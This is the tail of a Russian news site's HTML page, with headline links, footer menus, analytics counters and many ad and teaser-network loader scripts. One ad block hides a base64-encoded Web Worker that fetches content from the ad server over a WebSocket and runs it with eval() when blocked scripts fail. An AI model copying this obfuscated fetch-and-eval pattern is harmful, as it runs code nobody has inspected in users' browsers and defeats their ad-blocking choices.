														<p class="live">Live</p>
							<p>Со всеми прошедшими и со Старым Новым Роком&hellip;</p></a>
							
						</li>			


		</ul>		<noindex>
		<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




		</noindex>
						
		
		<div id="lx_561097"></div>
<script type="text/javascript">(function(){var j=183738,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
	


		
<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>



<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>





		
		
		
		<!---->
			
			


		<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/politics/2017/07/541051?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/946b23d77b0e8d1e50f18c782d66f71d.png" alt="Bloomberg: Американские дипломаты опасаются, что Путин переиграет Трампа" /></a>
						<a href="http://argumenti.ru/politics/2017/07/541051?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Bloomberg: Американские дипломаты опасаются, что Путин переиграет Трампа</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2015/04/395171?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/9227626c7e8f5d0b59c97fbbd1d1bb71.jpg" alt="«Немцов и до смерти плодил ненависть и разногласия в стране!»

 " /></a>
						<a href="http://argumenti.ru/live/2015/04/395171?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">«Немцов и до смерти плодил ненависть и разногласия в стране!»

 </a>
		</li>
			<li>
							<a href="http://argumenti.ru/society/n597/540980?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/b55a250ad052db46e8d3d608c0c325b3.jpg" alt="Тень династии Романовых на православии" /></a>
						<a href="http://argumenti.ru/society/n597/540980?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Тень династии Романовых на православии</a>
		</li>
	</ul>
		
		



<!-- R-50615-1 Яндекс.RTB-блок  -->
<div id="yandex_ad_R-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-50615-1",
                renderTo: "yandex_ad_R-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>						<h2 class="namerub"><span class="rem">//</span>Новости GlobalTeaser</h2>
<div id="teaser_13630"><a href="http://globalteaser.ru/" rel="nofollow">Новости GlobalTeaser</a></div>
<script type="text/javascript">document.write('<scr'+'ipt type="text/jav'+'ascript" async src="http://globalteaser.ru/show/?block_id=13630&r='+escape(document.referrer)+'&'+Math.round(Math.random()*100000)+'"></scr'+'ipt>');</script>


<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN13735" class="news-block-magick">
    <div id="LentaInformPreloadN13735">
                <a href="http://lentainform.com/" target="_blank" rel="nofollow">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN13735")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN13735");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13735;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/a/r/argumenti.ru.13735.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->		
		
			
			
		<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>			
					

		
		
		




	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		</div>	    <center>
<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>
</center>	<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
													</div>
</div>
			<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li><a style="color:red;"  href="http://argumenti.ru/sport">Спорт</a></li>
		</ul>
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/na">Нацакцент</a></li>
			<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li><a style="color:red;" href="http://argumenti.ru/charity">Сможем вместе</a></li>
		</ul>
</div></div>
	
	

<div class="footer_line">



	<div id="logo_footer">
		<!--noindex-->
			<div id="endline">
		<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
     </div>

	</div>

<!--noindex-->

	<div id="copy">
		<ul id="footer_menu">
			<li>Ваш город: /</li>
			<li><a href="http://argumenti.ru/reklama/internet.html" rel="nofollow">РЕКЛАМА</a> +7 (495) 981-68-36</li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p><a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></p>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
					Сетевое издание "Аргументы неделi". Свидетельство о регистрации Эл № ФС77-60728 от 09 февраля 2015 г. выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор).
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>


<div id='top100counter' style="float:right"></div>
<script type="text/javascript">
var _top100q = _top100q || [];

_top100q.push(["setAccount", "1425289"]);
_top100q.push(["trackPageviewByLogo", document.getElementById("top100counter")]);


(function(){
var top100 = document.createElement("script"); top100.type = "text/javascript";

top100.async = true;
top100.src = ("https:" == document.location.protocol ? "https:" : "http:") + "//st.top100.ru/top100/top100.js";
var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(top100, s);
})();
</script>
<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>

            
<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>




<!--<script type="text/javascript" src="http://an.yandex.ru/system/context.js"></script>-->


<!--// Rating@Mail.ru logo-->

<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=631008" type="text/javascript"></script>


</script>
</body>
</html>